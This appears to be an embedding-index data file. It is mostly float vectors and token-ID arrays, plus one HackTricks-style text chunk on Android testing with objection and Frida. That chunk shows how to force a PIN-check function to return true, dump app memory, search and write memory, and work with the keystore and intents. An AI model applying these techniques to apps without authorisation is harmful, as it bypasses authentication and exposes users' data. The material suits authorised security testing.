0.11552946269512177, -0.5418303608894348, -0.3153296411037445, 0.40008285641670227, 0.5213520526885986, -0.4461210072040558, 0.6197904944419861, 0.4310198724269867, -0.0568704754114151, 0.3516729176044464, -0.2375299334526062, 0.2178550511598587, -0.04326982796192169, -0.026329975575208664, 0.3996559679508209, -0.19905897974967957, -0.19636201858520508, -0.6224730610847473, 0.5188554525375366, -0.13883867859840393, -0.23543435335159302, -0.19250132143497467, -1.0527924299240112, 0.29924800992012024, -1.175872564315796, 0.4929703176021576, -1.0812128782272339, 0.5288944244384766, 0.4622458517551422, -0.05988316237926483, 0.06813924759626389, -1.4430986642837524, 4.514233112335205, 0.6663963198661804, 0.2747705280780792, 0.18786542117595673, 0.5510687232017517, 1.0331394672393799, 0.6819953918457031, -0.0036457395181059837, 0.6418778896331787, -0.5104015469551086, 0.6058236956596375, 0.29187750816345215, 0.3003765046596527, 0.3487106263637543, 0.4965551197528839, 0.39111611247062683, -0.6542759537696838, 0.38649433851242065, 0.1789454072713852, -0.6110889911651611, -0.9412322044372559, 0.03391769528388977, -0.3927284777164459, 0.366993248462677, 0.1935291588306427, -0.19530126452445984, 0.25935980677604675, -1.0763167142868042, 0.04267125949263573, -0.31896841526031494, 0.061590492725372314, -0.8885722160339355, -0.07907326519489288, -0.08851590007543564, -0.6119673252105713, -0.21678397059440613, 0.037928517907857895, -0.9578945636749268, -0.4166421890258789, 0.012977109290659428, 0.11287053674459457, 0.05073828250169754, 0.575666606426239, -0.42838919162750244, 0.32393088936805725, 0.8279449343681335, -1.1690113544464111, 0.919417142868042, 0.5528507828712463, -0.6383906006813049, 0.516521155834198, -0.2585401237010956, 0.45748665928840637, 0.09757491946220398, -0.5748261213302612, -0.02843622677028179, 0.4245644211769104, -0.40150415897369385, -0.447498619556427, 0.019883383065462112, -0.40622538328170776, -0.27847930788993835, -0.13694852590560913, 0.4864532947540283, -0.8703752160072327, 0.2148384302854538, -0.6700558066368103, 0.23698437213897705, -0.02992800995707512, 0.5070411562919617, -0.3307442367076874, 0.13522806763648987, -0.22514991462230682, -0.06219923496246338, 0.9671925902366638, 0.02285197377204895, -0.5010752081871033, 0.7515268921852112, 0.40672898292541504, -0.106168232858181, -0.1004074290394783, -0.38306865096092224, -0.8792576789855957, 0.0773681029677391, 0.8699073791503906, 0.15074782073497772, -0.6882596015930176, -0.3478866517543793, 0.023732570931315422, 0.5385170578956604, 0.7672474980354309, 0.5403655767440796, -0.08140471577644348, -0.16353288292884827, 0.40890467166900635 ]
[ 2672, 2017, 2064, 2156, 2242, 2047, 2004, 2182, 2017, 2097, 2069, 2031, 1037, 3143, 2862, 1997, 4280, 1010, 4725, 1998, 15612, 5200, 1012, 2023, 2003, 2036, 6179, 2140, 2065, 5064, 2017, 2024, 4039, 2000, 2131, 2070, 3191, 3085, 3120, 3642, 1997, 1996, 10439, 1012, 2862, 3450, 1010, 19278, 1998, 2578, 5685, 22943, 8103, 2075, 2862, 3450, 5685, 22943, 8103, 2075, 2862, 2578, 5685, 22943, 8103, 2075, 2862, 19278, 27439, 2050, 2097, 4888, 2019, 7561, 2065, 3904, 2003, 2179, 18150, 3436, 2783, 4023, 5685, 22943, 8103, 2075, 2131, 2783, 1035, 4023, 17310, 11140, 4280, 13461, 2707, 2559, 2005, 4280, 2503, 2256, 4646, 5685, 22943, 8103, 2075, 3945, 4280, 2004, 17258, 1012, 21025, 2705, 12083, 1012, 22834, 1012, 10424, 8524, 29098, 17310, 11140, 4725, 1997, 1037, 2465, 19779, 11082, 14817, 1996, 4725, 2503, 1996, 2465, 2364, 18908, 7730, 1024, 11924, 8103, 2075, 3945, 4725, 2004, 17258, 1012, 21025, 2705, 12083, 1012, 22834, 1012, 10424, 8524, 29098, 2364, 18908, 7730, 9863, 4161, 4725, 1997, 1037, 2465, 2007, 2037, 11709, 13461, 3275, 2041, 15536, 2818, 11709, 2515, 1996, 4725, 1997, 1996, 2465, 2342, 1024, 11924, 8103, 2075, 2862, 2465, 1035, 4725, 2004, 17258, 1012, 21025, 2705, 12083, 1012, 22834, 1012, 10424, 8524, 29098, 1012, 2364, 18908, 7730, 9863, 4280, 29337, 2071, 2036, 2862, 2035, 1996, 4280, 2008, 2020, 8209, 2503, 1996, 2783, 10439, 19341, 3406, 2378, 1024, 11924, 8103, 2075, 2862, 4280, 1001, 2862, 2035, 8209, 4280, 1010, 2004, 1996, 4539, 4646, 4152, 2109, 5974, 1010, 2023, 3094, 2097, 2709, 2062, 4280, 1012, 2023, 2003, 2200, 6179, 2065, 2017, 2215, 2000, 8103, 1996, 4118, 1997, 1037, 2465, 1998, 2017, 2069, 2113, 1996, 2171, 1997, 1996, 2465, 1012, 2017, 2522, 5313, 2224, 2023, 3853, 2000, 3945, 2029, 11336, 8617, 1996, 2465, 1998, 2059, 8103, 2049, 4118, 1012, 8103, 2075, 2108, 3733, 6806, 23212, 3070, 1006, 3666, 1007, 1037, 4118, 19699, 5358, 1996, 3120, 3642, 1997, 1996, 4646, 2057, 2113, 2008, 1996, 3853, 7680, 1006, 1007, 2013, 2364, 18908, 7730, 2003, 2108, 2448, 2296, 2117, 1012, 11082, 3046, 2000, 15653, 2035, 2825, 2592, 2169, 2051, 1996, 3853, 2003, 2170, 1006, 9918, 1010, 2709, 3643, 1998, 2067, 6494, 3401, 1007, 1024, 11924, 8103, 2075, 3422, 2465, 1035, 4118, 2004, 17258, 1012, 21025, 2705, 12083, 1012, 22834, 1012, 10424, 8524, 29098, 1012, 2364, 18908, 7730, 1012, 7680, 1011, 1011, 15653, 1011, 12098, 5620, 1011, 1011, 15653, 1011, 2067, 6494, 3401, 1011, 1011, 15653, 1011, 2709, 6806, 23212, 3070, 1006, 3666, 1007, 2019, 2972, 2465, 18908, 28488, 1045, 2424, 2035, 1996, 4725, 1997, 1996, 2465, 2364, 18908, 7730, 2428, 5875, 1010, 11082, 8103, 2068, 2035, 1012, 2022, 6176, 1010, 2023, 2071, 5823, 2019, 4646, 1012, 11924, 8103, 2075, 3422, 2465, 2004, 17258, 1012, 21025, 2705, 12083, 1012, 22834, 1012, 10424, 8524, 29098, 1012, 2364, 18908, 7730, 1011, 1011, 15653, 1011, 12098, 5620, 1011, 1011, 15653, 1011, 2709, 10128, 2017, 2377, 2007, 1996, 4646, 2096, 1996, 2465, 2003, 13322, 2017, 2097, 2156, 2043, 2169, 3853, 2003, 2108, 2170, 1010, 2049, 9918, 1998, 1996, 2709, 3643, 1012, 5278, 22017, 20898, 2709, 3643, 1997, 1037, 3853, 19699, 5358, 1996, 3120, 3642, 2017, 2064, 2156 ]
hack_tricks
429.txt
1
that the function checkpin gets a string as argument and returns a boolean. lets make the function always return true : now, if you write anything in the text box for the pin code you will see tat anything is valid : class instancessearch for and print live instances of a specific java class, specified by a fully qualified class name. out is the result of an attempt at getting a string value for a discovered objection which would typically contain property values for the object. android heap print _ instances < class > keystore / intentsyou can play with the keystore and intents using : android keystore listandroid intents launch _ activityandroid intent launch _ servicememorydumpmemory dump all < local destination > # dump all memorymemory dump from _ base < base _ address > < size _ to _ dump > < local _ destination > # dump a partlistmemory list modulesat the bottom os the list you can see frida : lets checks what is frida exporting : search / writeyou can alse search and write inside memory with objection : memory search " < pattern eg : 41 41 41?? 41 > " ( - - string ) ( - - offsets - only ) memory write " < address > " " < pattern eg : 41 41 41 41 > " ( - - string ) sqliteyou cals can use the command sqlite to interact with sqlite databases. exitexitwhat i miss in objectionthe hooking methods sometimes crashes the application ( this is also because of frida ). you can't use the instaces of the classes to call functions of the instance. and you can't create new instances of classes and use them to call functions. there isn't a shortcut ( like the one for sslpinnin ) to hook all the common crypto methods being used by the application to see cyphered text, plain text, keys, ivs and algorithms used. register - register - [SEP]
[ 0.03216344118118286, 0.16950920224189758, 0.23222219944000244, 0.0669957622885704, -0.32457756996154785, -0.3008928894996643, 0.10231035202741623, -0.01325606182217598, 0.5945577025413513, 1.084426999092102, 0.6083647608757019, 0.2519323527812958, 0.31442275643348694, -0.620850682258606, -0.4754642844200134, 0.0925869271159172, 0.3148309290409088, 0.34818243980407715, 0.14027942717075348, -0.13131068646907806, 0.6943647265434265, -0.37703654170036316, -1.0136172771453857, -0.3235878050327301, -0.35686588287353516, -0.25242364406585693, 0.9955134987831116, 0.005956088192760944, 0.503444254398346, 0.8730978965759277, -0.011148976162075996, 0.02792118489742279, 0.8088608980178833, -0.4879065752029419, -0.09012525528669357, -0.35043036937713623, 1.1136921644210815, -0.4265415370464325, 0.09684281051158905, -0.44422778487205505, -0.11120534688234329, 0.3952525556087494, 0.6868219375610352, -1.0249748229980469, -0.6586922407150269, -0.2448684126138687, -0.05826660245656967, 0.10193038731813431, -0.00621004356071353, -0.4725624620914459, -0.37769660353660583, 0.6235279440879822, -0.05223137512803078, -0.017949407920241356, -0.20068608224391937, -0.20644021034240723, -0.3234638273715973, -0.3132758140563965, -0.44297507405281067, 0.4083482623100281, -0.19429677724838257, -0.0003479367005638778, 0.28840556740760803, -0.9674925208091736, -0.28958556056022644, 0.5739669799804688, -0.0090547576546669, -0.43122872710227966, -0.4229818880558014, -1.6032088994979858, -0.42703893780708313, 0.6487218737602234, -0.21334657073020935, -1.1318596601486206, -0.45485731959342957, 0.14307115972042084, -0.33068642020225525, 0.2746600806713104, -0.026660876348614693, 0.6766054034233093, -0.17515237629413605, 0.22915492951869965, 0.17385470867156982, -0.4035259485244751, -0.287238746881485, -0.7332252860069275, 0.1187688484787941, -0.19119782745838165, 0.2131115198135376, -0.48080962896347046, 0.048374325037002563, 0.5580068826675415, -0.47045373916625977, 0.37071770429611206, 0.829881489276886, 0.6873146295547485, 0.094484843313694, -0.14313951134681702, 0.4526764452457428, -0.4405958950519562, 0.8014796376228333, 0.7853401899337769, -0.9354012608528137, 0.2003215253353119, -0.2023126482963562, 0.820155680179596, 0.04136072099208832, 0.9102783203125, -0.9442993998527527, -0.4870212972164154, -0.009202232584357262, 0.5205841064453125, 0.2855679988861084, -0.242063969373703, -0.9614344835281372, 0.49607202410697937, 0.44065022468566895, -0.14345483481884003, 0.12333394587039948, -0.6744303703308105, 0.3897208273410797, -0.1024336889386177, 0.1735147386789322, -0.5200031995773315, 0.5800708532333374, 0.44074422121047974, 0.3257308900356293, 1.2299323081970215, -0.2065902203321457, 0.43157142400741577, -0.37970539927482605, 0.10638909041881561, 0.4904557168483734, 0.31303760409355164, -0.7272742986679077, 0.1744769811630249, -0.21114112436771393, -0.26061636209487915, 0.46337583661079407, -0.04008350893855095, 0.42683708667755127, -0.10354679077863693, 0.27507123351097107, 1.4811583757400513, -0.25641557574272156, -0.4647592008113861, 0.406694233417511, 0.2743864953517914, -0.5848743319511414, 0.006694263778626919, -0.03262200579047203, 0.30986425280570984, 0.5219262838363647, 0.37445101141929626, 0.7473610043525696, -0.3746069371700287, -0.02633412554860115, 0.9982826113700867, -0.029250653460621834, -0.21999356150627136, -0.2830299437046051, 0.5995578765869141, -0.2908669412136078, 0.5205657482147217, 0.0038123419508337975, 0.3001459538936615, -0.03921864926815033, -0.1268005222082138, 0.35514718294143677, -0.5507073402404785, 0.3192005157470703, 0.940116286277771, -0.10186363756656647, -0.07478180527687073, 1.022879958152771, 0.0841192677617073, 0.1463482528924942, -0.14902082085609436, -0.07278723269701004, 0.375723272562027, -0.508954644203186, 0.12066034972667694, -0.3187631666660309, 0.5509705543518066, 0.18597279489040375, -0.04041436314582825, 0.15930435061454773, -0.37799569964408875, -0.0976714938879013, -0.04448546841740608, 0.20405976474285126, 0.3589019477367401, -0.6813663244247437, 0.04764512926340103, 0.12708249688148499, 0.18036681413650513, -1.5645791292190552, 0.15460799634456635, -0.2957814335823059, -1.2104188203811646, -0.5936546921730042, 0.24373897910118103, 0.35722672939300537, 0.07083739340305328, -0.5005106329917908, -0.7089767456054688, 0.3522370755672455, 0.6863492131233215, -0.20916488766670227, 0.31691479682922363, -0.42909151315689087, 0.11831045895814896, -0.08139582723379135, 0.35203003883361816, 0.1451740711927414, -0.22350488603115082, -0.2700170576572418, 0.2859531342983246, 0.35643744468688965, 0.6154256463050842, -0.07539776712656021, 0.6664248704910278, 0.24181465804576874, 0.1642078310251236, -0.7755386233329773, -0.13256315886974335, 0.6817890405654907, 0.0962536558508873, 0.4577412009239197, 0.2803661823272705, -0.10823017358779907, 1.0160410404205322, 0.5736442804336548, 0.24306230247020721, -0.17138580977916718, 0.04207180067896843, 0.5563676953315735, 0.2885438799858093, -0.03141246363520622, 0.5147074460983276, -0.7979037165641785, 0.9172763824462891, -0.09897757321596146, 0.5292803645133972, -0.3348131775856018, -0.6573404669761658, 0.2213151901960373, 0.41853249073028564, 0.05843236669898033, 0.37331223487854004, -0.8908405303955078, 0.967761754989624, 0.3581686019897461, 0.2215804010629654, -0.42308923602104187, -0.8280462622642517, 0.03810218721628189, -0.20781037211418152, -0.9401195645332336, 0.055785130709409714, 0.7085902094841003, 0.35518908500671387, -0.10246533155441284, -0.2677347958087921, 0.05607584863901138, 0.7613434791564941, 1.1697893142700195, 0.03119751438498497, -0.690154492855072, -0.458090603351593, -0.7790276408195496, -0.3106482923030853, -0.5033425688743591, -0.15961475670337677, -0.5071679949760437, 0.39197590947151184, 0.1954917013645172, -1.1826163530349731, 0.6007077097892761, -0.6278663873672485, 0.05923657864332199, 0.33171746134757996, -0.1259385347366333, 0.5305202007293701, 0.39348578453063965, 0.2170703113079071, -0.5009316802024841, -0.13808725774288177, 0.1691754162311554, 0.4898439049720764, -0.2782972455024719, -0.11296852678060532, -0.5882562398910522, 0.014754231087863445, 0.05379694700241089, -0.676267147064209, 0.353704571723938, -0.23431247472763062, -0.03416663780808449, 0.2090693563222885, -0.8471056222915649, -0.22303341329097748, -0.34222516417503357, 0.021971214562654495, -0.22785964608192444, 0.3619033992290497, 0.6554394364356995, -0.6936617493629456, 0.9336998462677002, 1.0527527332305908, 0.19031976163387299, 0.3723258078098297, 0.05893825367093086, -0.1063726469874382, -0.8069930672645569, 0.7062771320343018, 0.4323158264160156, -0.22967039048671722, -0.3462831676006317, -1.014278531074524, -0.25280386209487915, -0.2785012722015381, -0.9583213329315186, 0.10562949627637863, -0.4340521991252899, 0.5649703741073608, -0.7272683382034302, -1.564669132232666, 0.35761573910713196, -1.0555938482284546, 0.6902084946632385, -0.02459455095231533, -0.1398725062608719, 0.5912386178970337, 0.016749735921621323, 0.5165752172470093, -0.11163260042667389, -0.24106135964393616, -0.39359450340270996, 0.03793487697839737, 0.27542319893836975, -0.44822266697883606, 0.12425883114337921, 0.011745127849280834, 0.3170720636844635, -0.12625989317893982, -0.15993429720401764, -0.25150734186172485, -0.13182097673416138, -0.5137401819229126, -0.506841778755188, 0.16334186494350433, -0.00196306430734694, 0.1010325625538826, 0.5228136777877808, 0.7489244937896729, 0.020056942477822304, -0.1370917707681656, 0.19845162332057953, 0.5310726761817932, -0.007610415108501911, 0.32731473445892334, 0.8276158571243286, 0.023645345121622086, -0.3184976577758789, -0.8557626008987427, -0.4662476181983948, 0.5292325615882874, 0.34447503089904785, -0.48511114716529846, -0.014777032658457756, -0.2733578085899353, -0.5034115314483643, 0.505797266960144, -0.7443884015083313, -0.954757571220398, 1.1019573211669922, -0.5369407534599304, 1.1128922700881958, -0.6384488344192505, -0.06967546045780182, -0.10777848213911057, 0.376131147146225, 0.8129122257232666, 0.20258033275604248, 0.18086819350719452, -0.3484472334384918, -0.10277149826288223, -0.693156898021698, 0.24301251769065857, -0.21456070244312286, 0.19405999779701233, -0.11778485774993896, -0.6468180418014526, -0.4803103506565094, -0.2273482084274292, 0.0658261775970459, 0.47517186403274536, 0.24057240784168243, 0.17406322062015533, -0.3866828680038452, 0.41834619641304016, 0.019041143357753754, 0.7994381785392761, -1.0678069591522217, 0.42306002974510193, -0.44439923763275146, 0.3892004191875458, 0.04419872909784317, 0.2984269857406616, -0.14023499190807343, -0.22015564143657684, -0.23123084008693695, 0.11606647074222565, 0.43731099367141724, 0.061206936836242676, -0.455258846282959, 0.32361653447151184, 0.41444647312164307, 0.23857803642749786, 0.008844416588544846, -0.6801452040672302, -0.5543327927589417, -0.13536614179611206, 0.7372450232505798, -0.1078076884150505, -0.15928830206394196, -0.05769581347703934, 0.41839706897735596, 0.5812820196151733, -0.5881603956222534, -0.37648317217826843, -0.3326779007911682, -0.5568121075630188, -1.0524479150772095, -0.25309860706329346, 1.0639761686325073, -0.3280459940433502, 0.25920525193214417, -0.45887789130210876, 0.16985277831554413, 0.7045519948005676, -0.14386147260665894, -0.044014960527420044, -0.3923535645008087, 0.43021246790885925, 0.4039921760559082, 0.19993990659713745, -0.17247627675533295, -0.1738615334033966, 0.43784329295158386, -0.9912518262863159, 0.016110891476273537, -0.8720538020133972, -0.1859763264656067, -0.3051128685474396, 0.2403993159532547, -0.7680007815361023, 0.5202168822288513, -0.23476645350456238, 0.5294427275657654, -0.037268027663230896, 0.36755362153053284, 0.05042378976941109, -0.3508961498737335, 0.11585181206464767, 0.1859811693429947, -0.35904064774513245, 0.25367602705955505, 0.4347463548183441, -0.23147159814834595, 0.5002253651618958, 0.0036073566880077124, -1.0183157920837402, 0.5187581181526184, -0.2348524034023285, 0.5410518646240234, 0.24810415506362915, -0.5494418144226074, -0.4477000832557678, -0.890920877456665, 1.061848759651184, 0.89251708984375, -0.2538486123085022, -0.3725235164165497, -0.6632461547851562, -0.1698826551437378, -0.6166341304779053, -0.19253183901309967, 0.4624714255332947, -0.21784916520118713, -0.659591794013977, -0.3566494286060333, 0.014551948755979538, -0.39801913499832153, 0.129041850566864, -0.14515915513038635, -0.5823750495910645, 0.548108696937561, 0.8144000172615051, 0.9241765737533569, -0.17520573735237122, -0.8061047196388245, 0.5057931542396545, -0.027826711535453796, 0.19400206208229065, 0.06818380951881409, -0.46100881695747375, 0.2455180436372757, -0.20368517935276031, -0.4899851381778717, 0.3350035846233368, -0.329105943441391, -0.3533008396625519, 0.5716380476951599, -0.0764012411236763, 0.6926483511924744, 0.03417171165347099, -1.0293279886245728, 0.41931843757629395, 0.46686047315597534, -0.5847105979919434, -0.6578883528709412, 0.2160651981830597, -0.23609131574630737, 0.2558095157146454, 0.09029954671859741, -0.3881426155567169, -0.5153576731681824, -0.6242340803146362, 0.16349773108959198, -0.22694161534309387, 0.01666792668402195, -0.842086911201477, 0.0017570153577253222, -0.5482703447341919, 0.38831886649131775, 0.18581639230251312, -0.44423821568489075, 0.23673789203166962, -0.19106252491474152, 0.458410382270813, -0.6286520957946777, -0.1136237308382988, -0.9233314394950867, -0.049354638904333115, 0.01686238683760166, 0.7276194095611572, 0.32639846205711365, 0.3942957818508148, -0.035477302968502045, 0.42571842670440674, -0.1492365449666977, 0.0729333832859993, -0.5142418742179871, -0.16507771611213684, -0.3782319128513336, 0.10448969900608063, -0.6347423791885376, 0.5992386341094971, -1.2476879358291626, -0.16341674327850342, -0.20805615186691284, 0.5847503542900085, -0.4696432054042816, 0.18758049607276917, -0.009776207618415356, 0.11055399477481842, 0.41690123081207275, -0.2797359526157379, -0.41959184408187866, -0.5049676895141602, 0.53413987159729, -0.6985611915588379, -0.3352758586406708, -0.5975359678268433, -0.2988051772117615, -0.8341776132583618, -0.9409595727920532, 0.4758627414703369, -0.36361512541770935, -0.10215478390455246, -0.09547389298677444, -0.17012561857700348, 0.5114161968231201, -0.5452439188957214, -0.047821130603551865, 0.773412823677063, 0.36336439847946167, -0.2020692229270935, -0.3502828776836395, 0.049928005784749985, 0.4580425024032593, -1.4790623188018799, 0.18229350447654724, 0.24316900968551636, -0.2948357164859772, -0.008981485851109028, -0.20224016904830933, -0.8433551788330078, -0.20510894060134888, -0.0033033760264515877, 0.9112863540649414, -0.09987859427928925, 0.5700196027755737, -0.4335353374481201, -0.469252347946167, -0.30906835198402405, 0.33171090483665466, -0.5784841775894165, 0.051759421825408936, 0.3302139341831207, 0.3683640658855438, -0.42391520738601685, 0.3626503646373749, -0.36756187677383423, 0.11718915402889252, -0.2437073439359665, 0.772428035736084, -0.08570317178964615, -0.4570813775062561, 0.289651483297348, 0.13354966044425964, -0.41560277342796326, -0.38161584734916687, -0.13216523826122284, -0.3760582208633423, 0.06485942751169205, -0.1995878368616104, -0.5676920413970947, -0.058007530868053436, -0.33581098914146423, 0.5430953502655029, 0.1108078882098198, -0.241096630692482, 0.10570070892572403, -0.8491482734680176, 0.8927698135375977, -0.12109778821468353, -0.19869494438171387, 0.742171049118042, -0.3738119304180145, 0.5182697772979736, -0.5302566289901733, -0.13889458775520325, -0.6099153161048889, 0.20821526646614075, 0.2910989224910736, 0.45530328154563904, 0.051447395235300064, 0.4784208834171295, -0.07259561121463776, 1.2938686609268188, -0.40323442220687866, 0.42068418860435486, 0.7702731490135193, -1.2107319831848145, -0.21085603535175323, -0.17524895071983337, -0.25791120529174805, 0.0915224552154541, -0.24017782509326935, -0.47359785437583923, -0.21476620435714722, 0.23260708153247833, 0.973529577255249, -0.5034850835800171, -0.8569588661193848, -0.24702320992946625, -0.3815806806087494, -0.3228524625301361, -0.5303777456283569, -0.8874330520629883, 0.372008740901947, -0.29883772134780884, -0.3742663562297821, -0.7934326529502869, -0.18514956533908844, 0.7882896065711975, -0.26144230365753174, 0.5867368578910828, -0.7053467035293579, -0.315551221370697, -0.34606432914733887, -0.7280848622322083, -0.8326711654663086, 0.257049024105072, -0.07683799415826797, -0.71153324842453, -0.9711975455284119, -0.35557714104652405, -0.6625836491584778, 0.4958360493183136, -0.5667267441749573, 0.018394023180007935, -0.20862118899822235, -0.3890228271484375, 0.18427622318267822, -0.4183524549007416, -0.05415729805827141, 0.796761691570282, -0.14304347336292267, -0.3148692548274994, 0.12344322353601456, -0.5906806588172913, 0.007616993505507708, -0.13790695369243622, 0.09368281811475754, -0.011982535943388939, -0.14733697474002838, -0.05727599561214447, -0.1516096591949463, -0.11152472347021103, -0.2471393197774887, 0.14017614722251892, -0.8403194546699524, 0.12360282987356186, 0.0589425265789032, -0.2946699857711792, 0.20308734476566315, 0.6329784393310547, -0.24062730371952057, 0.23965664207935333, -0.189006507396698, 0.03519554063677788, 0.7438389658927917, 1.0702658891677856, 0.6029542684555054, 0.12043594568967819, -0.18437515199184418, 0.2188420295715332, 0.011334256269037724, -0.03650371730327606, -0.2683314383029938, 0.5535615682601929, -0.12260530143976212, 0.35137829184532166, -0.7006496787071228, 0.25430577993392944, 0.08528599888086319, -0.034712839871644974, 0.8009049892425537, -0.5585410594940186, -0.3596769869327545, 0.3186144232749939, 0.30621886253356934, 0.4202582538127899, -1.4702600240707397, -0.7898114919662476, 0.35029491782188416, -0.2941742539405823, -0.6737180352210999, -0.44380924105644226, -0.04052421823143959, 0.04058285802602768, 0.6123310923576355, -0.337094247341156, -0.11997226625680923, 0.3419729471206665, -0.10943926125764847, 0.3176460564136505, 0.0844205692410469, -0.11996135115623474, 0.5390298962593079, 0.5021961331367493, -0.2751390039920807, -1.5630894899368286, -0.12296617776155472, 0.5400320887565613, 0.3994421660900116, -0.6588072776794434, -0.11766926944255829, 0.09956644475460052, 0.732092559337616, 0.8389357924461365, 0.0811477079987526, 0.24635276198387146, -0.9618588089942932, 0.8609796166419983, -0.9958540797233582, 0.47269460558891296, 0.26130419969558716, 0.13859789073467255, 0.42782270908355713, -0.3000761568546295, -0.2210477739572525, 0.059142641723155975, 1.0106325149536133, 0.2320842742919922, 0.4921538233757019, 0.6307241916656494, 0.449025422334671, -0.8056373000144958, -0.24178287386894226, 0.23495197296142578, 0.7608117461204529, 0.8212478160858154, 0.2195630669593811, -0.16825933754444122, 0.5275400280952454, 0.13798639178276062, -0.3510189354419708, -0.432325154542923, 0.6242817044258118, -0.1971786916255951, -0.06772049516439438, 0.34828004240989685, 0.3937346637248993, 0.14851953089237213, 0.33794060349464417, -0.63360595703125, -0.17288178205490112, -0.3536098003387451, -0.11615140736103058, -0.3464294970035553, -0.14503155648708344, 0.2003086805343628, 0.16384370625019073, 0.42061689496040344, 0.12882892787456512, -0.43591707944869995, 0.7112407684326172, 0.5022136569023132, -0.9752169847488403, -0.42568373680114746, 0.504318118095398, 1.0143853425979614, 0.2079925537109375, 0.4967744052410126, 0.28756335377693176, 0.3879593312740326, -0.5253452658653259, 0.3533261716365814, -0.0658266618847847, -0.024218719452619553, 0.5642744898796082, -0.43500185012817383, -0.35759618878364563, 0.3739052712917328, -0.19112050533294678, -0.09863840043544769, -0.07204136997461319, -0.1290045827627182, 0.047183167189359665, -0.6347396373748779, 0.2541922926902771, -0.3407997190952301, 0.06373211741447449, 0.7157645225524902, 0.12901431322097778, -0.6075658202171326, 0.6988353133201599, -0.08881396055221558, 0.1645057201385498, 0.1419239044189453, 0.6506588459014893, -0.055322691798210144, 1.1923362016677856, 0.48627597093582153, -0.8773666620254517, -0.1149812713265419, 0.010995889082551003, -0.6537612676620483, 0.1108960211277008, 0.14282841980457306, -0.30240070819854736, 0.3125106394290924, -0.7882401943206787, -0.6304096579551697, 0.021218642592430115, 0.36978384852409363, 0.4866930842399597, -0.8037402033805847, 0.7775204181671143, 0.409725159406662, -1.048292875289917, 0.5114101767539978, 0.6618469953536987, 0.03728945553302765, 0.7107875943183899, -0.44286417961120605, -0.4714595377445221, -0.10622605681419373, 0.19379080832004547, -0.9449650049209595, 0.4170698821544647, -0.6706717014312744, -0.5114558935165405, -0.23591241240501404, -0.38372212648391724, -0.2544659972190857, -0.5230147838592529, 0.03275396674871445, -0.4055274724960327, 0.13272400200366974, 0.5679529309272766, 0.29002392292022705, -0.05273815989494324, -0.454834908246994, -0.1834772825241089, 0.3968687951564789, 0.7966737747192383, -0.5026796460151672, 0.8239243030548096, 0.3459789752960205, -0.1526050567626953, 0.9124220609664917, 0.3944081664085388, 0.03308393806219101, -0.049185577780008316, 0.3631313145160675, 0.11476586014032364, -0.07300012558698654, -0.4008038341999054, -0.30104804039001465, -0.014566200785338879, 0.020470453426241875, -0.43108320236206055, -0.2514595091342926, -0.2732676863670349, -0.3166024684906006, -1.1037168502807617, 0.24025817215442657, -0.6734981536865234, 0.01266137883067131, -0.38637349009513855, -0.15085066854953766, 0.4318356215953827, -1.5338054895401, 4.37076997756958, 0.8069562315940857, 0.4241780638694763, 0.41136524081230164, 0.3274575173854828, 0.704983651638031, 0.6784082651138306, -0.4945332109928131, -0.7704956531524658, -0.5287075638771057, 0.6412494778633118, -0.4190088212490082, -0.0944363921880722, 0.8366815447807312, 0.39686301350593567, 0.06393668800592422, -0.4908252954483032, -0.0030443472787737846, 1.0313682556152344, -0.4321158230304718, -0.27349838614463806, 0.41679489612579346, 0.17270517349243164, 0.4916870892047882, 0.3098476529121399, -0.0241694413125515, -0.08838295936584473, -0.7815545201301575, -0.5173435211181641, 0.03215707466006279, 1.037123680114746, -0.5810930132865906, 0.89420086145401, -0.13203492760658264, -0.04476388916373253, 0.5511119365692139, 0.7893509268760681, -0.1349535584449768, 0.04519984871149063, 0.11406902968883514, 0.22609375417232513, -0.06659017503261566, -0.11696404218673706, 0.02371823601424694, -0.2278592437505722, -0.03269020840525627, -0.7174960374832153, 1.230144739151001, 0.9767566323280334, -0.48597922921180725, 0.780532717704773, -0.23468634486198425, 0.38185709714889526, -0.30903303623199463, -0.4607241153717041, -0.12611499428749084, -0.1865374743938446, -0.21633011102676392, -0.16131950914859772, -0.01016202848404646, -0.0733344554901123, 0.13570740818977356, -0.9067573547363281, 0.5393072962760925, -0.8868719935417175, 0.15869909524917603, -0.2224448025226593, 0.9798874855041504, -0.3028797507286072, -0.2493811547756195, -0.20965276658535004, -0.19339388608932495, 0.0058275870978832245, 0.17631393671035767, -0.21263331174850464, 0.29471325874328613, -0.06567131727933884, 0.8545912504196167, 0.16825170814990997, -0.15656857192516327, 0.3351832330226898, 0.37813764810562134, -0.6389645934104919, -0.204304501414299, 0.9675040245056152, 0.934026300907135, -0.4530826508998871, 0.02623104490339756, -0.39302465319633484, -0.0007690053898841143, 0.8850448727607727, 0.33137083053588867, 0.22537076473236084, -0.08994419872760773, 0.12610043585300446 ]
[ 2008, 1996, 3853, 4638, 8091, 4152, 1037, 5164, 2004, 6685, 1998, 5651, 1037, 22017, 20898, 1012, 11082, 2191, 1996, 3853, 2467, 2709, 2995, 1024, 2085, 1010, 2065, 2017, 4339, 2505, 1999, 1996, 3793, 3482, 2005, 1996, 9231, 3642, 2017, 2097, 2156, 11937, 2102, 2505, 2003, 9398, 1024, 2465, 12107, 17310, 11140, 2005, 1998, 6140, 2444, 12107, 1997, 1037, 3563, 9262, 2465, 1010, 9675, 2011, 1037, 3929, 4591, 2465, 2171, 1012, 2041, 2003, 1996, 2765, 1997, 2019, 3535, 2012, 2893, 1037, 5164, 3643, 2005, 1037, 3603, 22224, 2029, 2052, 4050, 5383, 3200, 5300, 2005, 1996, 4874, 1012, 11924, 16721, 6140, 1035, 12107, 1026, 2465, 1028, 6309, 19277, 1013, 7848, 6508, 7140, 2064, 2377, 2007, 1996, 6309, 19277, 1998, 7848, 2015, 2478, 1024, 11924, 6309, 19277, 2862, 5685, 22943, 7848, 2015, 4888, 1035, 4023, 5685, 22943, 7848, 4888, 1035, 2326, 4168, 5302, 2854, 8566, 8737, 4168, 5302, 2854, 15653, 2035, 1026, 2334, 7688, 1028, 1001, 15653, 2035, 3638, 4168, 5302, 2854, 15653, 2013, 1035, 2918, 1026, 2918, 1035, 4769, 1028, 1026, 2946, 1035, 2000, 1035, 15653, 1028, 1026, 2334, 1035, 7688, 1028, 1001, 15653, 1037, 2112, 9863, 4168, 5302, 2854, 2862, 14184, 4017, 1996, 3953, 9808, 1996, 2862, 2017, 2064, 2156, 10424, 8524, 1024, 11082, 14148, 2054, 2003, 10424, 8524, 9167, 2075, 1024, 3945, 1013, 4339, 29337, 2064, 25520, 2063, 3945, 1998, 4339, 2503, 3638, 2007, 22224, 1024, 3638, 3945, 1000, 1026, 5418, 